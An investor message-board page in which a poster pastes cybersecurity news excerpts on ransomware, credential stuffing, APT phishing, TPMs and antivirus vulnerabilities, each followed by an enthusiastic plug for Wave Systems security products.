Register for free to join our community of investors and share your ideas. You will also get access to streaming quotes, interactive charts, trades, portfolio, live options flow and more tools.
Register for free to join our community of investors and share your ideas. You will also get access to streaming quotes, interactive charts, trades, portfolio, live options flow and more tools.
French IT giant Sopra Steria hit by Ryuk ransomware
https://www.bleepingcomputer.com/news/security/french-it-giant-sopra-steria-hit-by-ryuk-ransomware/
Excerpt:
Sopra Steria is a European information technology company with 46,000 employees in 25 countries worldwide.
==================================================================
Post #246140 could show organizations that they have another way (investing in Wave solutions) to deal with ransomware. This investment could alleviate the possibility that insurance carriers could drop their insurance!!!
==================================================================
wavesys.com
==================================================================
Wave solutions, better security!!!
US Treasury Department ban on ransomware payments puts victims in tough position
https://www.csoonline.com/article/3587108/us-treasury-department-ban-on-ransomware-payments-puts-victims-in-tough-position.html
The Treasury Department's advisory warns companies not to pay ransoms to sanctioned entities. The move complicates ransomware incident response and might encourage insurance carriers to drop ransomware coverage.
=================================================================
wavesys.com
=================================================================
Wave solutions, better security!!!
Retail, Hospitality and Travel Hit by 64 Billion Credential Stuffing Attacks
https://www.infosecurity-magazine.com/news/retail-hospitality-travel-64-bn/
Over 60% of credential stuffing attacks detected over the past two years have been targeted at retail, travel and hospitality businesses, according to Akamai.
The security vendor’s latest report, Loyalty for Sale, is compiled from internet traffic flowing through its extensive global content delivery network.
It revealed that, during the period July 1 2018 to June 30 2020, it detected over 100 billion credential stuffing attempts. Almost 64 billion of these were aimed at cracking open user accounts in the retail, travel and hospitality sectors.
Further, retail accounted for the vast majority (90%+) of the attacks aimed at these verticals.
Such attacks remain popular given the continuous surge of breached log-ins onto underground sites and the potentially rich pickings to be found inside cracked accounts.
“Criminals are not picky — anything that can be accessed can be used in some way,” said Steve Ragan, Akamai security researcher and report author.
“This is why credential stuffing has become so popular over the past few years. These days, retail and loyalty profiles contain a smorgasbord of personal information, and in some cases financial information too. All of this data can be collected, sold and traded, or even compiled for extensive profiles that can later be used for crimes such as identity theft.”
Akamai also claimed that during the early days of the COVID-19 crisis as consumers flooded online sites to purchase goods, cyber-criminals began recirculating old credential lists in an attempt to identity new vulnerable accounts.
The report identified not just credential stuffing activity but also attempts to compromise sites directly via SQL Injection (SQLi) and Local File Inclusion (LFI) attacks.
Akamai detected nearly 4.4 billion web attacks against the retail, hospitality and travel sectors, comprising 41% of the total across all verticals. Once again, retail (83%) was the most popular target, while SQLi attacks (79%) were the number one choice of cyber-criminals across the three verticals.
=================================================================
wavesys.com
=================================================================
Wave solutions, better security!!!
Cybersecurity company finds hacker selling info on 186 million U.S. voters
https://www.nbcnews.com/politics/2020-election/cybersecurity-firm-finds-hacker-selling-info-148-million-u-s-n1244211
The cybersecurity company Trustwave said the hacker was offering 186 million U.S. voter records and 245 million records of other personal data.
WASHINGTON — A cybersecurity company says it has found a hacker selling personally identifying information of more than 200 million Americans, including the voter registration data of 186 million.
The revelation underscored how vulnerable Americans are to email targeting by criminals and foreign adversaries, even as U.S. officials announced that Iran and Russia had obtained voter registration data and email addresses with an eye toward interfering in the 2020 election.
Much of the data identified by Trustwave, a global cybersecurity company, is publicly available, and almost all of it is the kind that is regularly bought and sold by legitimate businesses. But the fact that so many names, email addresses, phone numbers and voter registration records were found for sale in bulk on the so-called dark web underscores how easily criminals and foreign adversaries can deploy it as the FBI said Iran has done recently, by sending emails designed to intimidate voters.
"An enormous amount of data about U.S. citizens is available to cyber criminals" and foreign adversaries, said Ziv Mador, vice president of security research at Trustwave, which found the material.
"In the wrong hands, this voter and consumer data can easily be used for geotargeted disinformation campaigns over social media, email phishing and text and phone scams," he added, "before, during and after the election, especially if results are contested."
The data is a mix of material stolen in various hacks of companies in recent years and publicly available data retrieved from government websites, he said. In most states, voter registration information is publicly available, for example.
Trustwave monitors dark web forums for threat information, and it came across a hacker calling himself Greenmoon2019 who was offering the data for sale. Trustwave used fictitious identities to induce the hacker to provide more information, including a Bitcoin wallet that Greenmoon2019 used to collect payment.
Bitcoin wallets — virtual storage facilities for the most commonly used cryptocurrency — publicly display transactions but not the identities of those making them. Trustwave was able to trace payments to a larger wallet, created in May, that has taken in $100 million in what the company believes is illicit proceeds, Mador said. Not all of that was from data sales, he said.
The wide availability of personal information is not new, but the idea that such a huge cache is for sale as the election approaches underscores how easy it would be for malicious actors to cause trouble. Trustwave said the hacker was offering 186 million voter records and 245 million records of other personal data.
National Intelligence Director John Ratcliffe said Wednesday night that Iran had obtained voter registration information and used it to send threatening emails to Democrats while posing as the Proud Boys, a white supremacist group. Ratcliffe said the Russian government had also obtained voter registration information.
=================================================================
wavesys.com
=================================================================
Wave solutions, better security!!!
Hardware-based encryption is the key to future proofing data protection concerns
http://digitalmarketingmagazine.co.uk/digital-marketing-data/hardware-based-encryption-is-the-key-to-future-proofing-data-protection-concerns/5077
?With recent changes to data protection laws, the data protection landscape is rapidly changing in scope, breadth and depth. Data protection is no longer simply a part of risk management, but also governance and compliance – meaning organizations today must keep up with all that is happening in the world of data protection.
The permanent physical loss of key information such as customer account information could have a severe negative impact on a business and bring about huge penalties and legal costs. The loss of confidentiality of information through a data breach can carry high security threats and put businesses of all sizes at risk. With such high security risks and huge penalties at stake, the protection of electronically stored information – in all its different expressions – should be at the forefront of any business.
As data and business processes evolve with technological advances, enterprises are actively examining how to improve the data protection function from the perspectives of people, processes and technology. In order to select the right data protection technology, the business needs to understand the overall data protection infrastructure portfolio into which individual data protection technologies should fit.
The growing advantages of hardware-based encryption
The disadvantages of software-based encryption have become increasingly apparent in the industry over the years. In software encryption, there are more possible attack vectors that can lead, among others, to the ability for a hacker to crack the password. Software encryption tools also share the processing of your computer, which can cause the whole machine to slow down as data is encrypted/decrypted.
Despite the apparent disadvantages of software-based encryption, some users remain unaware of the potential to solve these problems with hardware-based encryption. Through an industry-wide, open specification for hardware-based Self Encrypting Drives (SEDs), e.g., Opal Family Specifications, developed by Trusted Computing Group (TCG), the issues caused by software-based encryption are being addressed and the reasons for using a SED continue to grow.
Compared to software-based encryption, hardware-based encryption built into a drive offers simplified management, interoperability among drives from different vendors and most importantly no performance impact. In fact, using a SED is much more cost-effective than buying higher performance main laptop processors when software Full-Disk Encryption (FDE) is used. SEDs integrate to systems and image the same as non-encrypting drives, with no initial encryption necessary, nor re-encryption when drives are re-imaged.
SEDs and TPMs – the perfect match for future security threats
Strong user authentication is critical for better security. With a SED, access to the platform is based on secure authorization from the SED and not by the software that can be fooled into allowing unauthorized access to data. Mixing hardware-based encryption with Trusted Platform Modules (TPMs) can provide even stronger security benefits. Through combining hardware-based technologies like SEDs with TPMs, enterprises add another layer of security to their systems, ensuring the possibility of any loss of data is drastically reduced.
Hardware-based encryption brings a lot of necessary advantages including compliance, stronger security, integrated authentication and low total cost of ownership with an additional benefit of rapid data destruction or crypto-erase. While these convincing reasons remain valid, additional security scenarios provide even more compelling justification for organizations.
With ever-increasing data demands and the potential for new security threats in the future, corporations are investing in the technology to futureproof their business processes. New approaches such as SEDs, give corporations a way to obtain improved security without the shortcomings of software-based encryption. Once potential users correctly and completely understand the capabilities of SEDs and the misconceptions are corrected as well, the increasing availability of SED options will provide the solution to cope with data security threats both now and long into the future.
?Written by By TCG Storage Workgroup.
==================================================================
wavesys.com
==================================================================
Wave solutions, better security!!!
Is Encryption the Answer to Data Security Post Lockdown? #NCSAM
https://www.infosecurity-magazine.com/opinions/encryption-answer-lockdown/
Remote work and working from home has grown exponentially over the past decade. In fact, a 2018 study from Apricorn found that 100 per cent of surveyed IT decision makers noted that they had employees who work remotely at least some of the time.
However, the COVID-19 pandemic and resulting lockdown have forced a large number of employees into unfamiliar territory, not just remote work, but full-time working from home (WFH). While some businesses may have long adopted remote work strategies as part of increased flexibility, others have resisted due to the risks posed to data security and compliance efforts.
Worryingly, a more recent (2020) survey by Apricorn found that more than half (57 percent) of UK IT decision makers still believe that remote workers will expose their organization to the risk of a data breach. Employees unintentionally putting data at risk remains the leading cause of a data breach, with lost or misplaced devices the second biggest cause.
More than a remote risk
Whilst some are already transitioning back into the workplace, many are questioning whether WFH could become the new norm. The issue remains however, that remote working brings a number of challenges to data protection: be it an increased risk of external attacks, or employees’ tendency to relax security practices when working from home. Whatever the case, sensitive information leaving the confines of the office walls will always be more vulnerable than when it is safely secured on the corporate network.
Employees may well be tempted to use personal devices when working from home, or businesses may have introduced the need for video conferencing tools, or document sharing services, but it is critical that businesses take the onus on securing information before employees further put data at risk.
Our survey found that, of those with an information security strategy that covers employees’ use of their own IT equipment for mobile/remote working, forty two per cent said they permitted only corporate IT provisioned/approved devices, and have strict security measures in place to enforce this with endpoint control. Additionally, seven percent tell employees they’re not allowed to use removable media, but don’t have technology in place to prevent this.
Every organization should cover the use of employees’ own IT equipment for mobile and remote working in their information security strategy. If businesses want to secure data on the move, it is essential that encryption and endpoint control is applied to all devices, whether that be laptops, mobile phones, or removable devices such as USBs.
Data must remain on lockdown
Despite COVID restrictions showing some signs of easing, data must always remain on lockdown. Whether working from home or not, the GDPR has clear mandates for data encryption; firstly for compliance (Article 32); secondly to mitigate the impact on any organization who suffers a breach (Article 34) which removes the obligation to individually inform each citizen affected if the data remains unintelligible.
Additionally, article 83 suggests that fines will be moderated where the company has been responsible and mitigated any damage suffered by data subjects. Businesses will find that they are in a stronger position to defend themselves in the event of a breach should they be able to demonstrate the use of encryption practices.
The good news is that we have seen an increase in encryption and endpoint control. Nearly all survey respondents (94%) say their organization has a policy that requires encryption of all data held on removable media. Of those that encrypt all data held on removable media, more than half (57%) hardware encrypt all information as standard.
Businesses are seeing the value of encryption, but this is an ongoing process and it needs to cover all devices. The research highlighted that a number of those surveyed have no further plans to expand encryption on USB sticks (38%), laptops (32%), desktops (37%), mobiles (31%) and portable hard drives (40%). With so much data now moving beyond the corporate perimeter, it’s imperative to address the importance of encryption in protecting sensitive information, whilst giving staff the flexibility required to work remotely.
The value of encryption
Hardware encryption offers much greater security than software encryption and PIN pad authenticated, hardware encrypted USB storage devices offer additional, significant benefits. Being software-free eliminates the risk of keylogging and doesn’t restrict usage to specific Operating Systems; all authentication and encryption processes take place within the device itself, so passwords and key data are never shared with a host computer. This makes it particularly suited for use in highly regulated sectors such as defense, finance, government and healthcare.
By deploying removable storage devices with built-in hardware encryption, a business can roll this approach out across the workforce, ensuring all data can be stored or moved around safely offline. Even if the device is lost or stolen, the information will be unintelligible to anyone not authorized to access it.
The pandemic has thrown up many challenges this year, but data protection should not have been one of them. It should not be an afterthought, something incorporated into the business strategy as a result of an incident, but one that’s core to business operations and security best practice.
Organizations should analyze their data, identify everything that should be protected, understand where it exists and how it is transported, and ensure that it is encrypted at all stages of its lifecycle. Encryption and endpoint control can ensure that data remains secure and businesses can be prepared for the risks that come with an enduring remote workforce.
=================================================================
wavesys.com
=================================================================
Wave solutions, better security!!!
What is a TPM?
https://securityboulevard.com/2020/10/what-is-a-tpm/
A TPM, also known as a Trusted Platform Module, is an international standard for a secure cryptoprocessor and is a chip found on the computer’s motherboard. The function of a TPM is to generate encryption keys and keep a part of the key inside the TPM rather than all on the disk. This is helpful for when an attacker steals the disk and tries to access the contents elsewhere. The TPM provides hardware-based authentication so if the would-be attacker were to try and remove the chip and place it onto another motherboard, or try to tamper with the motherboard to bypass the encryption, it would deny access.
What is the Difference Between HSM and TPM?
For the most part hardware security modules (HSM) and TPMs are similar in function and are used for encryption, but there are two notable differences that can be made between the two. A hardware security module is typically an external device while TPMs are chips that are embedded into the motherboard. The other difference is that you can easily add an HSM to a computer or network, while a TPM is usually not considered feasible to add after the computer is in use.
Does My Computer Have a TPM?
Off-the-shelf computers have a TPM soldered onto the motherboard, however, if you are building your own computer then you can easily buy one as an add-on module for a relatively cheap price. Installing a TPM in your computer is very simple, just find the port on your motherboard (if it supports a TPM module) and plug it in.
Can You Remove a TPM chip?
This depends on the type of computer you owned. Like previously stated, if you purchased your computers off-the-shelf then the TPM is typically soldered onto the motherboard, meaning that removal of the TPM would damage both the TPM and motherboard rendering both useless for the attacker. However if you had the TPM as an add-on and installed it yourself, it can easily be removed, but the encrypted contents would still be safe as the TPM uses hardware-based authentication meaning that it can’t be used when affixed onto another motherboard.
Can You Clear a TPM?
Yes, all you need to do is go into your security center app. However, it is not recommended as it can lead to data loss and you would lose all created keys associated with the TPM. If you must clear your TPM, then it is strongly recommended to have a backup and recovery for any data that is stored in your TPM.
Can a TPM be Hacked?
For the most part, TPMs are secure, however a new attack found by Christopher Tarnovsky found a way to break chips that carry a TPM by essentially spying on them like a phone conversation. This attack was used on Infineon Technologies AG flagship model, which is regarded as one of the top makers of TPM chips.
So does that make TPMs a liability? Well, not exactly. This attack was so resource heavy that Tarnovsky stated that unless you are a multi-million dollar corporation, this attack just isn’t worth it and is incredibly difficult to pull off in a real-world environment.
Key Attestation
A key attestation with a TPM is like a signature where it proves the origin of the certificate to the certificate authority to acknowledge that the TPM that is making the request is the same TPM that the certificate authority trusts. Key attestation is important because it allows the private key to not only be stored on the disk, but another key to be isolated and stored inside the TPM on that device so that you can benefit from a higher level of security due to the non-exportability of the TPM key.
Trusted Platform Module with Certificates
Using a TPM as your only protection against attackers is not recommended, as although a TPM protects your files from a physical attack, the ever-present threat of the infamous MITM attack can still grant access to your files. SecureW2 uses certificates to prevent over-the-air attacks and our management portal also supports security key attestation, as our software client can attest to the location a private key has been generated on a security key, or any other device with a TPM. Our industry-leading PKI makes it easy to configure BYOD and managed devices for 802.1x authentication and self-enrollment for certificates in just a few clicks.
We have affordable options for organizations of every size. Check out our pricing here.
The post What is a TPM? appeared first on SecureW2.
==================================================================
wavesys.com
==================================================================
Wave solutions, better security!!!
Morgan Stanley Fined $60m Over Data Disposal
https://www.infosecurity-magazine.com/news/morgan-stanley-fined-60m-over-data/
American multinational investment bank and financial services company Morgan Stanley has been fined $60m for improperly disposing of personal data.
The substantial fine was imposed on Morgan Stanley Bank, N.A., and Morgan Stanley Private Bank, N.A. by the US Office of the Comptroller of Currency (OCC), which discovered deficiencies in the banks' data decommissioning practices.
The federal banking agency found that in 2016, the banks "failed to exercise proper oversight of the decommissioning of two Wealth Management business data centers located in the United States."
Among the issues flagged by the OCC were inadequate risk assessment and monitoring of third-party vendors and a failure to keep track of customer information.
A consent order for the assessment of a civil money penalty states that the banks "failed to effectively assess or address the risks associated with the decommissioning of its hardware; failed to adequately assess the risk of using third party vendors, including subcontractors; and failed to maintain an appropriate inventory of customer data stored on the devices."
Morgan Stanley, which is headquartered in New York City, was also found to have failed to exercise adequate due diligence in selecting the third-party vendor engaged by Morgan Stanley and failed to adequately monitor the vendor’s performance.
Three years on from the decommissioning of the two data centers, the OCC found data disposal at the banks was still not as it should be.
"In 2019, the banks experienced similar vendor management control deficiencies in connection with decommissioning other network devices that also stored customer data," stated the comptroller.
Morgan Stanley, at the OCC’s direction, notified potentially impacted customers of the 2016 incident, and voluntarily notified potentially impacted customers of the 2019 incident. The bank has undertaken initial corrective actions, and the OCC states that it "is committed to taking all necessary and appropriate steps to remedy the deficiencies."
The OCC found the noted deficiencies constitute "unsafe or unsound practices" and resulted in noncompliance with 12 CFR Part 30, Appendix B, "Interagency Guidelines Establishing Information Security Standards."
The $60m civil money penalty will be paid to the United States Treasury.
=================================================================
What about ABC Investment Bank that retires computers that show up on EBAY. It seems that investing in Wave SED management would be a lot better than a massive fine. Disposing of computers' hard drives is so much easier using the crypto erase feature with Wave SED management than the other methods!!! It's these difficult methods that could be the reason that the data remains on these hard drives and could lead to noncompliance and drives getting into the wrong hands, and fines!!
=================================================================
wavesys.com
=================================================================
Wave solutions, better security!!!
Trump ‘Nobody Gets Hacked’ Video Goes Viral
https://www.forbes.com/sites/kateoflahertyuk/2020/10/20/trump-nobody-gets-hacked-video-goes-viral/
==================================================================
wavesys.com
==================================================================
Wave solutions, better security!!!
Cybersecurity And Your Passwords
https://www.forbes.com/sites/forbestechcouncil/2020/10/19/cybersecurity-and-your-passwords/#e62b50137320
==================================================================
Wow, those are the recommendations. No wonder every user on the internet is fed up. Try Wave VSC 2.0 (2FA)!!! Its more secure and simpler to use (for enterprise). Wave Knowd (no passwords and unfortunately in retirement - but shouldn't be) could make the experience on the internet like no other! These two Wave solutions could make users much happier and more secure!!!
==================================================================
wavesys.com
==================================================================
Wave solutions, better security!!!
CyberArk Discover Numerous Vulnerabilities In Popular Antivirus Solutions
https://latesthackingnews.com/2020/10/09/cyberark-discover-numerous-vulnerabilities-in-popular-antivirus-solutions/
Researchers from CyberArk Labs have found serious vulnerabilities in multiple antivirus solutions. Briefly, they found privilege escalation bugs in these programs that exposed the devices to cyber threats. Vulnerabilities in antimalware products are significantly threatening since these programs usually run with high privileges, often at the admin level. Hence, any bugs here, especially the privilege escalation found by CyberArk, could give elevated access to an adversary.
Briefly, the researchers observed that in most cases, the issues existed because of the default DACLs of the C:\ProgramData directory. This director, on Windows, is accessible by all users, unlike the %LocalAppData% that specifies to the logged-in user only. It means any user can read/write files in ProgramData and will have full control of the data present here. Thus, any process created by a non-privileged user that a privileged user executes later will give rise to security issues. Such exploitation could allow for symlink attacks, whilst deleting arbitrary files and point to malicious files. Also, they found DLL hijacking flaw affecting some antivirus programs. Technical details about these vulnerabilities are available in the researchers’ post. Whereas, following is the list of all programs that had the vulnerabilities, with the respective CVEs. Kaspersky: CVE-2020-25045, CVE-2020-25044, CVE-2020-25043 Trend Micro: CVE-2019-19688, CVE-2019-19689 +3 Symantec: CVE-2019-19548 McAfee: CVE-2020-7250, CVE-2020-7310 Checkpoint: CVE-2019-8452 Fortinet: CVE-2020-9290 Avira: CVE-2020-13903 Microsoft: CVE-2019-1161 Avast + F-Secure: Waiting for Mitre
Please see the link for the rest of the article.
=================================================================
Wave Endpoint Monitor sounds better and better!!!
=================================================================
wavesys.com
=================================================================
Wave solutions, better security!!!
Google Says Chinese Hackers Are Impersonating McAfee to Trick Victims Into Installing Malware
https://gizmodo.com/google-says-chinese-hackers-are-impersonating-mcafee-to-1845399061
=================================================================
The same Chinese government-linked hackers who targeted the campaigns of both 2020 presidential candidates earlier this year have been trying to trick users into installing malware by posing as the antivirus provider McAfee and using otherwise legitimate online services like GitHub and Dropbox.
Shane Huntley, the head of Google’s Threat Analysis Group, offered new details about the suspected state-sponsored cyberattackers, known as APT 31, and their latest tactics in a company blog post on Friday. In June, Google’s security team uncovered high-profile phishing scams by APT 31 and Iranian state-sponsored hackers intended to hijack the email accounts of campaign staffers with President Donald Trump and Democratic nominee Joe Biden. (All of these phishing attempts appeared to have failed, Google said at the time).
On Friday, Huntley said that one of APT 31's latest hacking techniques involved emailing links that would download malicious code hosted on the open-source platform GitHub. The malware was built using the Python computing language and “would allow the attacker to upload and download files as well as execute arbitrary commands” through Dropbox’s cloud storage services, he wrote.
“Every malicious piece of this attack was hosted on legitimate services, making it harder for defenders to rely on network signals for detection,” Huntley said.
Another phishing scam saw the group impersonating McAfee, a legitimate and popular antivirus software provider, as a facade to quietly slip malicious code onto the target’s machine.
“The targets would be prompted to install a legitimate version of McAfee anti-virus software from GitHub, while malware was simultaneously silently installed to the system.”
Google did not specify which organizations or individuals were targeted in these latest APT 31-sponsored attacks or whether they affected either candidate’s political campaign. The tech giant only said that it had seen “increased attention on the threats posed by APTs in the context of the U.S. election” and shared these latest findings with the Federal Bureau of Investigation.
“U.S government agencies have warned about different threat actors, and we’ve worked closely with those agencies and others in the tech industry to share leads and intelligence about what we’re seeing across the ecosystem,” Huntley said.
He added that in the event that Google’s anti-phishing safeguards detect a government-backed attack, the company sends the intended victim a warning explaining that a foreign government may be targeting them.
Google isn’t the only tech giant seeing an increase in cyberattacks ahead of the election. In September, Microsoft reported that Chinese, Russian, and Iranian government-backed hackers had launched similarly unsuccessful attacks on high-profile individuals associated with both the Trump and Biden campaigns. Last week, the FBI and U.S. Cybersecurity and Infrastructure Security Agency also released details about campaigns by foreign government-linked hackers to exploit federal, state, and local government networks.
=================================================================
Wave Endpoint Monitor keeps sounding better and better!!!
=================================================================
wavesys.com
=================================================================
Wave solutions, better security!!!
Twitter hack probe leads to call for cybersecurity rules for social media giants
https://techcrunch.com/2020/10/14/twitter-hack-probe-leads-to-call-for-cybersecurity-rules-for-social-media-giants/?renderMode=ie11
=================================================================
Wave knowd tested under the NSTIC, and with Wave Scrambls could be two solutions where both Twitter and Facebook could have better security for them and their users: from the brilliant minds of Michael and Steven Sprague and others!!!
==================================================================
wavesys.com
==================================================================
Wave solutions, better security!!!
Robinhood Internal Probe Finds Hackers Hit Almost 2,000 Accounts
https://www.bloomberg.com/news/articles/2020-10-15/robinhood-estimates-hackers-infiltrated-almost-2-000-accounts
=================================================================
Users of 2FA in this article did not stop the hackers!!
=================================================================
Robinhood users, if given the choice of having 2FA or no passwords, Wave VSC 2.0 and Wave Knowd could have saved them a lot of money and stress that goes with losing money that is stolen. These two Wave solutions could have protected their other online accounts as well. Because these two solutions were created by The Trusted Computing Company, Wave, security is second to none.
=================================================================
wavesys.com
=================================================================
Wave solutions, better security!!!
Cybercrime Losses Up 50%, Exceeding $1.8B
https://www.darkreading.com/vulnerabilities---threats/cybercrime-losses-up-50--exceeding-$18b/a/d-id/1339041
Fewer companies are being hit by cyber incidents, but those that do get hit are hit harder and more often.
The world is rightly obsessed with the COVID-19 pandemic right now, but there's also a growing cybercrime pandemic. The good news is that fewer firms are reporting breaches. The bad news is that for those who are victimized, the attacks are more severe — and more expensive.
According Hiscox, a Bermuda-based insurance provider, cyber losses rose nearly sixfold worldwide over the past 12 months. Its recently released "Cyber Readiness Report 2020" pins the total cyber losses among affected firms at $1.8 billion — up a sobering 50% from the previous year's total of $1.2 billion. Overall, more than 6% of the respondents in the report paid a ransom, and their collective losses totaled $381 million.
Interestingly enough, Hiscox says that companies are 15 times more likely to experience a cyberattack (30% in UK) than a fire or theft (2% in UK).
Who Was Most at Risk?
Not surprisingly, larger organizations were the most common targets — and shelled out the most money — for cybercriminals. The financial impact differed widely across countries, verticals, and firm sizes. According to Hiscox, the energy, manufacturing, and financial services sectors are especially at risk. This is the result of low maturity in cyber resilience and low tolerance to what is often a high-impact outage.
Irish and German companies reported the biggest median losses, but the pain was widely shared. Among the attacked organizations, the median losses for energy firms increased over 30-fold, while a number of other sectors faced losses many times greater than the previous year. The biggest recorded loss for a single organization was $87.9 million (for a UK financial services firm), and the greatest loss stemming from a single attack was $15.8 million (for a UK professional services firm).
Cybercriminals demanded ransoms from roughly 17% of the companies they attacked, and caused dire financial consequences for the targets. The highest loss from ransom was more than $50 million for one unfortunate organization.
According to the Hiscox report, malware, ransomware, business email compromise, and distributed denial-of-service (DDoS) are still the most commonly used attack vectors. Besides malicious encryption imposed through ransomware, other extortion campaigns include DDoS attacks that causes the victim's IT infrastructure to crash over and over due to a constant flood of bogus IP traffic. Recently, the stock exchange in New Zealand weathered a barrage of DDoS attacks that disrupted business operations and trading for four consecutive days. CNBC reported that the exchange's websites and markets announcement platform were also affected.
Large Number of "Don't Knows"
According to Hiscox, this year the share of firms that revealed they'd suffered a cybersecurity incident in the last year shrank from 61% to 39%. At least that's positive. The flip side is that the financial blowback has been far greater than before. Larger companies were more likely to be targeted than smaller ones. Just over half (51%) of all enterprise-level firms — those with 1,000-plus employees — reported at least one cyber incident, and the most cyber incidents by far (median: 100) and breaches (80). The most heavily targeted sectors were financial services; manufacturing; and technology, media, and telecoms (TMT) — with 44% of firms in each sector reporting at least one incident or breach.
Of particular concern is that 11% of the respondents said they weren't sure how many times they were targeted. (That's 4% more than the previous year.) Even more worrisome is that the greatest share of "I don't knows" (15%) came from enterprise firms.
Surge in Spending
The report revealed that a large and broad increase in cybersecurity spending has occurred over the past year. The average spending among the respondents was $2.1 million, up from $1.5 million the previous year. (Roughly 75% of the respondents provided figures for their cybersecurity spending.) Assuming the numbers are an accurate reflection of what's going on more broadly, the total cybersecurity spending in the past year was a staggering $11.4 billion. That compares with $7.9 billion a year ago for a sample of companies that was 3% smaller. Nearly three-quarters of firms (72%) intend to boost cybersecurity spending by 5% or more in the next year — that's up from two-thirds (67%) from the 2019 number.
As one might expect, the companies that dedicated double-digit percentages of their IT budget were less likely to have suffered a breach than those that spent less than 5%. But those big spenders, typically larger firms, had higher average costs stemming from breaches. Greater size means more customers, higher notification expenses, and bigger ransoms.
Preparation Pays Off
A notably higher percentage of this year's respondents reported that they had a harder time attracting new customers (15% of firms were targeted, up from 5% last year) after a cyber incident. They also lost more customers (11%, compared with 5% in 2019) and/or business partners (12% compared with 4%).
When asked about the adverse effects of a breach, 14% of the respondents mentioned bad publicity that tarnishes the brand or the company's reputation. Only 5% said the same thing in 2019. Thirteen percent said business performance indicators — such as their share price — were affected, up from 5% last year.
In terms of cyber readiness, size matters. Hiscox reports that large companies have more resources and can spend an order of magnitude more on warding off online evildoers than their smaller counterparts. No surprise there. Among the smaller firms that were ready to face off with the cybercriminals, 16% were digitally savvy TMT companies. Retail and wholesale and construction were also well prepared (11% and 10%, respectively). The Hiscox report concludes that most of the best-protected organizations achieved their preparedness by "taking cyber security seriously."
=================================================================
An increase of $3.5 billion was spent on cybersecurity, and there was an increase of $600 million in loss due to cybercrime. The cybersecurity dollars could be spent in a more efficient and effective place: Wave solutions!!!
=================================================================
wavesys.com
=================================================================
Wave solutions, better security!!!
Iranian state hacker group linked to ransomware deployments
https://www.zdnet.com/article/iranian-state-hacker-group-linked-to-ransomware-deployments/
Amidst rising tensions between Israel and Iran, security researchers fear new escalation.
=================================================================
Iranian APT Group Targets Global Universities Again
https://www.infosecurity-magazine.com/news/iranian-apt-group-targets-global/
An Iranian state-backed APT group known for targeting universities for research materials has been detected in a new campaign coinciding with the start of the new academic year.
Silent Librarian (aka TA407, Cobalt Dickens) is once again casting the net wide geographically. It has registered phishing sites for universities in: Australia (Victoria, Adelaide and Melbourne Victoria), the UK (Glasgow Caledonian, King’s College London, Bristol, Cambridge and others), the US (North Texas, McGill, Stony Brook), Singapore (Nanyang Technological), Canada (Western, Toronto) and in Sweden, Germany and the Netherlands.
Using a similar pattern to that spotted in previous campaigns, the group keeps most of the domain intact but simply swaps the TLD, which can happen if organizations don’t defensively register enough variants.
Although Silent Librarian is using Cloudflare to hide the true location of its servers, Malwarebytes said it was able to identify several based in Iran.
“It may seem odd for an attacker to use infrastructure in their own country, possibly pointing a finger at them,” the firm’s Threat Intelligence Team wrote in a blog post. “However, here it simply becomes another bulletproof hosting option based on the lack of cooperation between US or European law enforcement and local police in Iran.”
It warned that although sites are being taken down as quickly as possible, the group has amassed a sizeable number in order to continue its phishing campaign unabated.
“IT administrators working at universities have a particularly tough job considering that their customers, namely students and teachers, are among the most difficult to protect due to their behaviors. Despite that, they also contribute to and access research that could be worth millions or billions of dollars,” said Malwarebytes.
“Considering that Iran is dealing with constant sanctions, it strives to keep up with world developments in various fields, including that of technology. As such, these attacks represent a national interest and are well funded.”
Silent Librarian has been spotted in 2018 and 2019 performing similar attacks.
=================================================================
Given these cyber incidents, Wave and its partners could be doing a superior job helping prevent these problems from occurring in the first place. Better security in Wave solutions could alleviate a lot of stress and save a lot of money in these instances. A good offense needs a great defense!!!
=================================================================
wavesys.com
=================================================================
Wave solutions, better security!!!
PwC 3200+ businesses and IT leaders share their views on what's changing and what's next in cybersecurity
PwC Twitter tweet Oct. 8.
==================================================================
The TPM is marching on as Methinks showed with Infineon. And this PwC cybersecurity report from 3200+ businesses at first glance shows no mention of hardware security or the TPM. What is remarkable is that 10 years ago and for a period of time PwC successfully used Wave software and the TPM in their 2FA. Wave VSC 2.0 was an improvement and organizations are able to set it up much faster than the PwC installation. It seems with this success with such a large and important company, and Infineon's continued success, a large global financial services company with TPMs that hardware security and Wave or partners should be helping a lot more organizations with Wave solutions.
==================================================================
wavesys.com
==================================================================
Wave solutions, better security!!!
Iran acknowledges cyberattacks on government departments
https://abcnews.go.com/International/wireStory/iran-acknowledges-cyberattacks-government-departments-73626268
=================================================================
Are governments prepared for Iran or other countries defensively? Using Trusted Computing and Wave solutions now could help governments' cyber defenses tremendously!!
=================================================================
wavesys.com
=================================================================
Wave solutions, better security!!!
President Trump Can’t Use $3.6 Billion in Military Funds for Border Wall Construction, Federal Court Rules
https://www.govexec.com/oversight/2020/10/president-trump-cant-use-36-billion-military-funds-border-wall-construction-federal-court-rules/169193/
==================================================================
Emergency funds at this point should be earmarked for cybersecurity/trusted computing!! Wave has better security, and these funds could go a long way in shoring up the government's cyber defenses!! What else is working really effectively like Wave solutions could? It only takes one threat to get through to potentially lose many gigabytes of important data!!! By not allowing unauthorized (unknown and unapproved) devices on the network, Wave solutions doesn't allow for unauthorized threats on the network.
==================================================================
wavesys.com
==================================================================
Wave solutions, better security!!!
Carnival Corp. Confirms Personal Information Compromised in Ransomware Incident
https://www.securityweek.com/carnival-corp-confirms-personal-information-compromised-ransomware-incident
==================================================================
'IT ensuring that only known and approved devices are accessing your network' comes with certain Wave solutions, and would be very helpful to Carnival which found that someone had unauthorized access to personal data. Thus unauthorized (unknown and unapproved) devices wouldn't have access to the Carnival network by using Wave solutions.
==================================================================
wavesys.com
==================================================================
Wave solutions, better security!!!
German tech giant Software AG down after ransomware attack
https://www.zdnet.com/article/german-tech-giant-software-ag-down-after-ransomware-attack/
Exclusive: The Clop ransomware gang is demanding more than $20 million from German tech firm Software AG.
Software AG, one of the largest software companies in the world, has suffered a ransomware attack over the last weekend, and the company has not yet fully recovered from the incident.
A ransomware gang going by the name of "Clop" has breached the company's internal network on Saturday, October 3, encrypted files, and asked for more than $20 million to provide the decryption key.
Earlier today, after negotiations failed, the Clop gang published screenshots of the company's data on a website the hackers operate on the dark web (a so-called leak site).
The screenshots show employee passport and ID scans, employee emails, financial documents, and directories from the company's internal network.
Software AG disclosed the incident on Monday when it revealed it was facing disruptions on its internal network "due to [a] malware attack."
